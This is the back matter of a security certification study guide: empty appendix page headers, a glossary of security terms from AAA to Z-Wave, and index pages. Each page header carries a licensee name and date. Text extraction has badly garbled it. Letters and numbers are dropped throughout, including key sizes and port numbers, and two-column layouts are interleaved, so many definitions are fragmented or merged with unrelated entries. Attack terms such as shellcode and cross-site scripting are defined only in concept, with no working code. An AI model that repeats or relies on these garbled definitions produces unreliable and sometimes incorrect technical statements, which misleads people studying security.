LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-14 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-15
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-16 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-17
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-18 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-19
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-20 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-21
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-22 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-23
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-24 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-25
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-26 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-27
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-28 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-29
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-30 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-31
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
A-32 | Appendix A
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Appendix A | A-33
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary
AAA (authentication, authorization, air gap A type of network isolation that
and accounting) A security concept physically separates a network from all
where a centrali ed platform verifies other networks.
sub ect identification, ensures the sub ect AIS (Automated Indicator Sharing)
is assigned relevant permissions, and Threat intelligence data feed operated by
then logs these actions to create an audit the D .
trail.
ALE (annual loss expectancy) The
ABAC (attribute-based access control) total cost of a risk to an organization on
An access control technique that an annual basis. This is determined by
evaluates a set of attributes that each multiplying the SLE by the annual rate of
subject possesses to determine if access occurrence (ARO).
should be granted.
AP (access point) A device that provides
account policies A set of rules governing a connection between wireless devices
user security information, such as and can connect to wired networks. Also
password e piration and uni ueness, known as wireless access point or WAP.
which can be set globally.
API (application programming
ACL (Access Control List) A collection interface) A library of programming
of access control entries (ACEs) that utilities used, for e ample, to enable
determines which sub ects user accounts, software developers to access functions
host I addresses, and so on are allowed of the TC I network stack under a
or denied access to the object and the particular operating system.
privileges given read only, read write, and
so on). application a are fire all A Layer 7
firewall technology that inspects packets
active defense The practice of at the Application layer of the OSI model.
responding to a threat by destroying or
deceiving a threat actor's capabilities. application fire all Software designed
to run on a server to protect a particular
adversarial AI ad ersarial artificial application such as a web server or SQL
intelligence) Using AI to identify server.
vulnerabilities and attack vectors to
circumvent security systems. APT (advanced persistent threat) An
attacker's ability to obtain, maintain, and
AES (Advanced Encryption Standard) diversify access to network systems using
A symmetric , , or bit block exploits and malware.
cipher based on the Rijndael algorithm
developed by Belgian cryptographers Joan Arduino Open-source platform producing
Daemen and Vincent Rijmen and adopted programmable circuit boards for
by the U.S. government as its encryption education and industrial prototyping.
standard to replace DES. ARO (annual rate of occurrence) In
Agile model (Agile) A software risk calculation, an e pression of the
development model that focuses on probability likelihood of a risk as the
iterative and incremental development number of times per year a particular loss
to account for evolving requirements and is expected to occur.
expectations. ARP inspection An optional security
AH (authentication header) An IPSec feature of a switch that prevents excessive
protocol that provides authentication for the A replies from ooding a network
origin of transmitted data as well as integrity segment.
and protection against replay attacks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-2 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-3
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-4 | Glossary
CCMP (counter mode with cipher block cloud deployment model Classifying the
chaining message authentication code ownership and management of a cloud as
protocol) An encryption protocol used public, private, community, or hybrid.
for wireless LANs that addresses the
Cloud Security Alliance Industry
vulnerabilities of the WEP protocol.
body providing security guidance to
CE (cryptographic erase) A method C s, including enterprise reference
of sanitizing a self-encrypting drive by architecture and security controls matrix.
erasing the media encryption key.
cloud service model Classifying the
chain of custody The record of evidence provision of cloud services and the limit of
history from collection, to presentation in the cloud service provider's responsibility
court, to disposal. as software, platform, infrastructure,
and so on. clustering A load balancing
change control The process by which
technique where a group of servers are
the need for change is recorded and
configured as a unit and work together to
approved.
provide network services.
change management The process
CN (common name) An attribute
through which changes to the
e pressing a host or user name, also
configuration of information systems are
used as the sub ect identifier for a digital
implemented, as part of the organi ation's
certificate.
overall configuration management e orts.
COBO (corporate owned, business only)
CHAP (Challenge Handshake
Enterprise mobile device provisioning
Authentication Protocol) Authentication
model where the device is the property
scheme developed for dial-up networks
of the organization and personal use is
that uses an encrypted three-way
prohibited.
handshake to authenticate the client
to the server. The challenge-response code of conduct Professional behavior
is repeated throughout the connection depends on basic ethical standards,
(though transparently to the user) to such as honesty and fairness. Some
guard against replay attacks. professions may have developed codes of
ethics to cover difficult situations some
checksum The output of a hash function.
businesses may also have a code of ethics
chmod Linu command for managing file
to communicate the values it expects its
permissions.
employees to practice. Also known as
CIA triad confidentialit inte rit ethics.
and availability) The three principles of
code reuse Potentially unsecure
security control and management. Also
programming practice of using code
known as the information security triad.
originally written for a di erent conte t.
or AIC triad.
code signing The method of using a
circuit le el state ul inspection fire all
digital signature to ensure the source and
A Layer firewall technology that tracks
integrity of programming code.
the active state of a connection, and can
make decisions based on the contents of cold site A predetermined alternate
network traffic as it relates to the state of location where a network can be rebuilt
the connection. after a disaster.
CIS (Center for Internet Security) A not- collector A network appliance that
for profit organi ation founded partly by gathers or receives log and or state data
SANS). It publishes the well-known "Top from other network systems.
20 Critical Security Controls" (or system
collision In cryptography, the act of two
design recommendations .
di erent plainte t inputs producing the
clean desk policy An organizational same exact ciphertext output.
policy that mandates employee work
community cloud A cloud that is
areas be free from potentially sensitive
deployed for shared use by cooperating
information; sensitive documents must
tenants.
not be left out where unauthorized
personnel might see them.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-5
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-6 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-7
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-8 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-9
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-10 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-11
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-12 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-13
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-14 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-15
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-16 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-17
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-18 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-19
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-20 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-21
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-22 | Glossary
SFTP (Secure File Transfer Protocol) SIP (Session Initiation Protocol) Used
A secure version of the File Transfer to establish, disestablish, and manage
rotocol that uses a ecure hell VoIP and conferencing communications
tunnel as an encryption method to sessions. It handles user discovery
transfer, access, and manage files. locating a user on the network ,
availability advertising (whether a user
SHA (Secure Hash Algorithm) A
is prepared to receive calls , negotiating
cryptographic hashing algorithm created
session parameters such as use of audio
to address possible weaknesses in MDA.
video , and session management and
The current version is A .
termination.
shadow IT Computer hardware, software,
SLA (service level agreement) Operating
or services used on a private network
procedures and standards for a service
without authorization from the system
contract.
owner.
SLE (single loss expectancy) The amount
shared account An account with no
that would be lost in a single occurrence
credential (guest) or one where the
of a particular risk factor.
credential is known to multiple persons.
smart card A device similar to a credit
shellcode Lightweight block of malicious
card that can store authentication
code that exploits a software vulnerability
information, such as a user's private key,
to gain initial access to a victim system.
on an embedded microchip.
shimming The process of developing and
smart meter A utility meter that can
implementing additional code between an
submit readings to the supplier without
application and the operating system to
user intervention.
enable functionality that would otherwise
be unavailable. SMiShing A form of phishing that uses
SMS text messages to trick a victim into
shoulder surfin A social engineering
revealing information.
tactic to obtain someone's password or
PIN by observing him or her as he or she sn1per Software utility designed for
types it in. penetration testing reporting and
evidence gathering that can also run
I securit identifier The value
automated test suites.
assigned to an account by Windows and
that is used by the operating system to SNMP (Simple Network Management
identify that account. Protocol) Protocol for monitoring and
managing network devices. SNMP works
SIEM (security information and event
over D ports and by default.
management) A solution that provides
real-time or near-real-time analysis of SOA (service-oriented architecture) A
security alerts generated by network software architecture where components
hardware and applications. of the solution are conceived as loosely
coupled services not dependent on a
signature-based detection A network
single platform type or technology.
monitoring system that uses a predefined
set of rules provided by a software vendor SOAP (Simple Object Access Protocol)
or security personnel to identify events An XML-based web services protocol that
that are unacceptable. is used to exchange messages.
SIM (subscriber identity module) A SOAR (security orchestration,
small chip card that identifies the user automation, and response) A class of
and phone number of a mobile device, security tools that facilitates incident
via an International Mobile Subscriber response, threat hunting, and security
Identity I MI . configuration by orchestrating automated
runbooks and delivering data enrichment.
sinkhole A DoS attack mitigation strategy
that directs the traffic that is ooding a SoC (system-on-chip) A processor that
target I address to a di erent network integrates the platform functionality of
for analysis. multiple logical controllers onto a single
chip.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-23
spear phishing An email-based or web- state actor A type of threat actor that
based form of phishing which targets is supported by the resources of its host
specific individuals. country's military and security services.
Also known as nation state actor.
SPIM (spam over internet messaging)
A spam attack that is propagated through state table Information about sessions
instant messaging rather than email. between hosts that is gathered by a
stateful firewall.
split tunnel N configuration where
only traffic for the private network is stateful inspection A technique used
routed via the VPN gateway. in firewalls to analy e packets down to
the application layer rather than filtering
SPoF (single point of failure) A
packets only by header information,
component or system that would cause
enabling the firewall to enforce tighter
a complete interruption of a service if it
and more security.
failed.
steganography A technique for obscuring
SQL injection (Structured Query
the presence of a message, often by
Language injection) An attack that
embedding information within a file or
injects a database query into the input
other entity.
data directed at a server by accessing the
client side of the application. STIX (Structured Threat Information
eXpression) A framework for analyzing
SSAE SOC (Statements on Standards
cybersecurity incidents.
for Attestation Engagements
Service Organization Control) Audit stored procedure One of a set of pre-
specifications designed to ensure that compiled database statements that can
cloud hosting providers meet professional be used to validate input to a database.
standards. A SOC2 Type II report is
STP (Spanning Tree Protocol) A switching
created for a restricted audience, while
protocol that prevents network loops by
SOC3 reports are provided for general
dynamically disabling links as needed.
consumption.
stream cipher A type of symmetric
SSH (Secure Shell) A remote
encryption that combines a stream
administration and file copy program that
of plaintext bits or bytes with a
supports Ns by using port forwarding,
pseudorandom stream initialized by a
and that runs on TCP port 22.
secret key.
I ser ice set identifier A character
stress test A software testing method
string that identifies a particular wireless
that evaluates how software performs
LAN (WLAN).
under extreme load.
SSO (single sign-on) An authentication
supplicant In A architecture, the device
technology that enables a user
requesting access to the network.
to authenticate once and receive
authorizations for multiple services. SWG (secure web gateway) An appliance
or proxy server that mediates client
SSTP (Secure Socket Tunneling
connections with the Internet by filtering
Protocol) A protocol that uses the TT
spam and malware and enforcing access
over SSL protocol and encapsulates an IP
restrictions on types of sites visited, time
packet with a PPP header and then with
spent, and bandwidth consumed.
an SSTP header.
symmetric encryption A two-way
standard naming convention Applying
encryption scheme in which encryption
consistent names and labels to assets
and decryption are both performed by
and digital resources identities within a
the same key. Also known as shared-key
configuration management system.
encryption.
stapling Mechanism used to mitigate
syslog A protocol enabling di erent
performance and privacy issues when
appliances and software applications to
re uesting certificate status from an C
transmit logs or event records to a central
responder.
server.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-24 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-25
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
G-26 | Glossary
war driving The practice of using a Wi-Fi XML injection Attack method where
sni er to detect LANs and then either malicious XML is passed as input to
making use of them if they are open exploit a vulnerability in the target app.
unsecured) or trying to break into them
XOR (exclusive OR) An operation that
(using WEP and WPA cracking tools).
outputs to true only if one input is true
warm site A location that is dormant and the other input is false.
or performs noncritical functions under
XSRF (cross-site request forgery) A
normal conditions, but which can be
malicious script hosted on the attacker's
rapidly converted to a key operations site
site that can exploit a session started on
if needed.
another site in the same browser. Also
watering hole attack An attack in which known as client-side request forgery or
an attacker targets specific groups or CSRF.
organi ations, discovers which websites
XSS (cross-site scripting) A malicious
they fre uent, and in ects malicious code
script hosted on the attacker's site or
into those sites.
coded in a link injected onto a trusted
WEP (Wired Equivalent Privacy) A legacy site designed to compromise clients
mechanism for encrypting data sent over browsing the trusted site, circumventing
a wireless connection. the browser's security model of trusted
zones.
whaling An email-based or web-based
form of phishing which targets senior zero trust Security design paradigm
executives or wealthy individuals. where any request (host-to-host
or container-to-container) must be
white team ta administering,
authenticated before being allowed.
evaluating, and supervising a penetration
test or incident response exercise. zero-day A vulnerability in software that is
unpatched by the developer or an attack
WinHex Forensics tool for Windows that
that exploits such a vulnerability.
allows collection and inspection of binary
code in disk and memory images. ero fill A method of sanitizing a drive by
setting all bits to zero.
worm A type of malware that replicates
in system memory and can spread over ZigBee Low-power wireless
network connections rather than infecting communications open source protocol
files. used primarily for home automation.
ig ee uses radio fre uencies in the .
WPA (Wi-Fi Protected Access) Standards
band and a mesh topology.
for authenticating and encrypting access
to i i networks. Also known as A , Z-Wave Low-power wireless
WPA3. communications protocol used primarily
for home automation. Z-Wave uses radio
WPS (Wi-Fi Protected Setup) A feature
fre uencies in the high to low
of WPA and WPA2 that allows enrollment
M and a mesh topology.
in a wireless network based on an 8-digit
PIN.
XaaS (anything as a service) Expressing
the concept that most types of IT
requirements can be deployed as a cloud
service model.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index
Page numbers with Italics represent charts, graphs, and diagrams.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-2 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-3
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-4 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-5
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-6 | Index
carving, files, 495 digital certificates, 106, 126 Choose Your Own Device
CASB (cloud access security GlobalSign, 127 (CYOD), 344
broker), 272 GoDaddy, 127 chosen ciphertext attack, 109
cat command, 278 hierarchical (Intermediate Chuvakin, Anton, “Magic
CBC. see cipher block chaining CA), 127-128 Quadrant” reports, 328
(CBC) mode IdentTrust, 127 CIA Triad. see confidentiality,
CBC (cipher block chaining) online vs offline CAs, 128 integrity, availability (CIA) triad
mode, 108 registration authorities (RAs), cipher, 96
CBT (computer-based 128-129 cipher block chaining (CBC)
training), 211 Sectigo/Comodo, 127 mode, 108
CCI (co-channel interference), 236 single CA, 127 Cipher Block Chaining Message
CCMP. see cipher block chaining Transport Layer Security Authentication Code Protocol
(CBC) mode (TLS), 292 (CCMP), 237
CCMP (Cipher Block Chaining trust model, 127 cipher suites
Message Authentication Code certificate-based tunneling, 240 cipher block chaining (CBC)
Protocol), 237 certificate chaining, 127-128 mode, 108
cellular data connections, certificate formats counter mode, 108
356-357 encoding key exchange/agreement
cellular network, embedded Distinguished Encoding algorithm, 108
systems, 333 Rules (DER), 140 signature algorithm, 108
Center for Internet Security (CIS) Privacy-enhanced Transport Layer Security
benchmarks, 12-13 Electronic Mail (PEM), 140 (TLS), 108, 293
centralized key management, file extensions, 141 ciphertext, 96
137 P7B format, 141 circuit-based alarm, 544
CER (Crossover Error Rate), PKCS #12 format, 141 CIS benchmarks, 12-13
172-173 certificate policies, 132 Cisco
CERT. see computer emergency certificates, update or revoke, 478 Aironet series, 245
response team (CERT) certificates and smart cards, 180 appliance firewall, 260
certificate and key management certificate signing request (CSR), ASA, 266
certificate expiration, 138 128-129, 142 Cloudlock, 426
certificate formats chain of custody, 485 digital forensics, 487
Distinguished Encoding chain of trust, 127 fog computing, 433
Rules (DER), 140 Challenge Handshake IP Flow Information Export
file extensions, 141 Authentication Protocol (CHAP), (IPFIX), 473
P7B format, 141 158, 304 logs, 168
PKCS #12 format, 141 change control, 530, 532 SAFE architecture, 216
Privacy-enhanced change management, 530, 532 CISO, 4
Electronic Mail (PEM), 140 CHAP (Challenge Handshake CIS-RAM. see Risk Assessment
issues with, 143 Authentication Protocol), 158, 304 Method (CIS-RAM)
life cycle of, 137. see also key checksum Citrix
management digital signatures, 104-105 ICA, 413
Online Certificate Status hashing algorithms, 97 XenApp, 413-414
Protocol (OCSP), 139-140 integrity and resiliency of XEN Server, 412
OpenSSL, 142 data, 113 Citrix Endpoint Management, 345
pinning, 140 Chef cloud orchestration clean agent fire suppression, 552
revocation lists, 138-139 platform, 430 clean desk policy, 209
certificate attributes, 130 Chief Information Security cleanup, pen test attack life
certificate authority (CA) Officer (CISO), roles and cycle, 70
certificate signing request responsibilities, 4 clickjacking, 376
(CSR), 128-129 Chief Security Officer (CSO), 4 Client Authentication, 132
defined, 126-127 Chinese cyber espionage units, 20 client-based errors (400
Digicert, 127 choke firewall, 222 range), 470
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-7
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-8 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-9
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-10 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-11
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-12 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-13
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-14 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-15
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-16 | Index
hardware root of trust (RoT), host-based intrusion detection/ guidelines for implementing,
318-319 prevention (HIDS)(HIPS), 327 341
hardware security module hosted private cloud, 408 secure filmware,
(HSM), 165, 422 host/environment security implementing
Hashcat, 161 data sanitization tools, boot integrity, 319-320
hashing 553-554 disk encryption, 320-321
database deidentification Faraday Cages, 550 end of life (EOL), 322-323
methods, 452 fire detection and end of service life (EOSL),
digital signatures, 104-105 suppression, 551-552 322-323
hashing algorithms, 97-98 hot/cold aisles, 551 hardware root of trust
hashing algorithms HVAC, 550 (RoT), 318-319
checksum, 97, 104-105 protected distribution, 550 organizational security
cryptographic ciphers, 97-98 secure areas, 548-549 agreements, 323
digital signatures, 104-105 secure data destruction, third-party risk
hashing, 97-98, 104-105 552-553 management, 322
message digest algorithm host hardware, 411 USB and flash drive
(MDA), 97-98 host-related intrusion detection security, 321-322
secure hash algorithm (SHA), systems (HIDS), 272 HOSTS files, 286
97-98 host security solutions hot aisle/cold aisle
head commands, 278 embedded system security arrangement, 551
health information, 441-442 implications HOTP (HMAC-based One-Time
Health Insurance Portability and communication Password Algorithm), 168-169
Accountability Act (HIPPA), 14, considerations, 333-334 hot plug PSU, 517
444, 504 constraints of, 331-332 hot site, 532-533
heating, ventilation, air facility automation, hotspots, 357-358
conditioning (HVAC), 550 336-337 hot storage, 422
heat map risk matrix, 503, 506 filmware code control, 339 HR policies. see human
heat maps, 236 industrial control resources (HR) policies
HSM (hardware security
heuristics, 271 systems, 334-335
module), 165
hibernation file, 492-493 Internet of Things (IoT),
HTML5 VPN, 310
HIDS (host-related intrusion 335-336
HTTP access logs, 470
detection systems), 272 logic controllers, 332
HTTP methods, 372-373
hierarchical (Intermediate CA), medical devices, 338
HttpOnly attributes, 384
127-128 multifunction printers
HTTPS (hypertext transfer
high availability (HA), 422-423, (MFPs), 337
protocol secure), 292
516-517 network segmentation,
HTTP Strict Transport Security
HMAC-based One-Time 338
(HSTS), 385
Password Algorithm (HOTP), vehicles and drones, 338
human-machine interfaces
168-169 Voice over IP (VoIP), 337 (HMIs), 334
hoaxes, 78-79 wrappers, 339 human resources (HR) policies
home automation devices, 336 endpoint security account policies
Homeland Security Act, 504 antivirus response, 329 access policies, 191-192
homomorphic encryption, 121 baseline configuration account attributes, 191
honeyfiles, honey nets, honey and registry setting, 326 account audits, 194
ports, 534-535 endpoint protection, account lockout and
horizontal (consumer-specific, 327-328 disablement, 196-197
cross-sector) legislation, 13-14 hardening systems, account password policy
horizontal brute force online 325-326 settings, 192-193
attacks, 159 next-generation endpoint account permissions, 195
horizontal privilege escalation, protection, 328-329 account restrictions,
366 patch management, 193-194
host-based firewall, 260 326-327 usage audits, 195-196
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-17
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-18 | Index
IEEE 802.1x port-based NAC disaster recovery plans, information life cycle
(PNAC), 166 462-463 management, 438-439
IKE (Internet Key Exchange), forensic procedures, 463 information security
307-308, 308 guidelines for, 482 benchmarks, 12-13
image backups, 525-526 identification of incidents, Cloud frameworks, 11-12
IMAP4 (Internet Message Access 465-466 competencies, 3-4
Protocol v4), 297 incident response plan (IRP), cybersecurity framework, 3
IMAPS (secure IMAP), 297 458-459 information security
iMessage, 360 incident response process, business units
impact assessment, 442 456-457 DevSecOps, 5-6
impersonation, 75-76 mitigation controls SOC, 5
Imperva, 273 adversarial artificial ISO, 11
Implicit TLS (FTPS), 296 intelligence, 480 regulations, standards, and
impossible travel time/risky content filter legislation, 13-14
login policy, 194 configuration changes, roles and responsibilities
improper input handling, 367 477-478 Chief Information Security
in-band connection, 310 endpoint configuration Officer (CISO), 4
incident containment changes, 478-479 Information Systems
isolation-based containment, eradication and Security Officer (ISSO), 4
475-476 recovery, 476 secure configuration guides
segmentation-based firewall configuration application servers, 13
containment, 476 changes, 476-477 network appliance
incident eradication and incident containment, platform, 12-13
recovery, 476 475-476 operating systems (OS),
incident response (IR) security orchestration, 12-13
business continuity plan automation, and vendor-specific guides,
(BCP), 463 response (SOAR), 479 12-13
communication plan, 458 MITRE ATT&CK, 460-461 web server applications, 13
continuity of operation playbook/runbook, 459, 479 security controls
planning (COOP), 463 retention policy, 463 compensating controls, 10
cyber incident response simulations, 462 deterrent controls, 10
team (CIRT), 457-458 stakeholder management, 458 functional types, 9, 10
cyber kill chain attack tabletop exercises, 461-462 managerial security
framework, 459-460 walkthrough exercises, 462 control, 8-10, 9
data sources incident response plan (IRP), operational security
application log files, 458-459 control, 8-10, 9
470-471 incident response process, physical controls, 9, 10
authentication logs, 470 456-457 technical security
metadata, 471-472 incineration data destruction, 552 controls, 8-10, 9
network data sources, incremental backups, 524-525 security roles, CIA Triad, 2
472-473 indicator of compromise (IoC), information security business
network log files, 469 28-29, 277 units
security and information Indoor Positioning System (IPS), DevSecOps, 5-6
event management 350-351 SOC, 5
(SIEM), 466-469 industrial camouflage, 541 Information Sharing and
system and security industrial control systems (ICSs), Analysis Centers (ISACs), threat
logs, 469 334-335 intelligence providers, 27
vulnerability scan Infiniband, 520 Information Systems Security
outputs, 470 influence campaigns, 82 Officer (ISSO), roles and
Diamond Model of Intrusion information assurance, security responsibilities, 4
Analysis, 461 controls, 8-10 Information Technology
Infrastructure (ITIL), 530-531
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-19
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-20 | Index
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Index | I-21
file system permissions, 200 operational technology (OT) long term retention, 522
head and tail commands, 278 attacks, 248 lookalike domains, 79
ifconfig, 36 persistence, 250 looping statements
iptables, 258-259 quality of service (QoS), 252 PowerShell, 393
journalctl, 469 scheduling, 250 Python, 391-392
KALI, 41 site resiliency, 532 scripting, 390
logger command, 278-279 source IP affinity, 250 loop prevention
memdump, 492 local replication, 422 Bridge Protocol Data Unit
mtr, 37 Local Security Authority (LSA), (BPDU) Guard, 230
Netcat, 46-47 Windows authentication, 154 broadcast storm prevention,
OpenSSL local service accounts, 185 229
certificate and key location services Spanning Tree Protocol
management, 142 geofencing and camera/ (STP), 228
certificate signing request microphone enforcement, 351 low observable characteristics
(CSR), 142 geolocation, 350-351 (LOC) attack, fileless malware, 85
root certificates, 141-142 GPS tagging, 352 LSA (Local Security Authority), 154
ParrotOS, 41 location-based LTE Machine Type
reverse shell, 396 authentication, 152 Communication (LTE-M), 333
root accounts, 184-185 location-based policies, 193 LulzSec, 20
SEAndroid, 347 Lockheed Martin whitepaper, lunchtime attacks, 77
Secure Erase (SE), 554 Intelligence-Driven Computer
Secure Shell (SSH), 311 Network Defense, 459 M
Security-Enhanced Linux, 347 lockout policy, 349
MAC
Security Module (LSM), 394 log files
address table, 228
service accounts, 186 application log files, 470-471
cloning, 227
SSH commands, 313 authentication logs, 470
filtering, 230
tcpdump, 42-43 network log files, 469
flooding, 228-229
traceroute, 37 system and security logs, 469
limiting, 230
Ubuntu vulnerability scan outputs, 470
network interface hardware
RedHat Linux container, logger command, 278-279
address, 218-219
413-414 logging platforms
MAC (mandatory access
root accounts, 185 journalctl, 469
control), 201
Volatility Framework, 492 NXlog, 469
MAC (message authentication
live acquisition, 492, 493 rsylog, 468
code), 109, 113
live off the land techniques syslog, 468
MacAfee
fileless malware, 85 syslog-ng, 468-469
data loss prevention (DLP), 450
remote access Trojans (RATs), logic bombs, 89-90, 416
SkyHigh Networks, 426
86-87 logic controllers for embedded
machine/computer
load balancers systems, 332
certificates, 134
amplification attack, 247-248 logic statements, 391-392, 393
machine learning (ML)
application attacks, 247-248 logon, 150
techniques, 31
clustering, 250-251 logs
macros, 396-397
distributed denial of service aggregation/banding
macro virus, 83
(DDoS), 247, 248-249 technique, 277
“Magic Quadrant” reports, 328
DNS amplification attack, 248 collection
magnetic hard disk, 553
layer 4 load balancer, 249 agent-based, 276
mailbox access, 296
layer 7 load balancer, 249 listener/collector, 276
mail delivery agent (MDA), 472
network appliances, 217-218 sensor, 276
Mail Exchanger (MX) record, 296
network redundancy, 518 syslog, 276
mail transfer, 296
Network Time Protocol (NTP), log reviews, 61-62
mail transfer server, 217
247-248 monitoring services, 275
mail user agent (MUA), 472
Long Term Evolution (LTE), 333
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
I-22 | Index
malicious code indicators Obad Android Trojan mean time to repair (MTTR), 511
Bourne Again Shell (Bash) malware, 359 mean time to respond
malicious indicators, 396 process analysis, 90-91 (MTTR), 479
credential dumping, 394 VM escaping, 414-415 measured boot, 319-320
lateral movement/insider Malware Information Sharing measurement systems analysis
attack, 394 Project (MISP), 27 (MSA), 323
macros, 396-397 MAM (mobile device media sanitization, 552-553
man-in-the-browser (MitB) management), 345 medical devices, 338
attack, 397 Managed Google Play, 352 memdump, 492
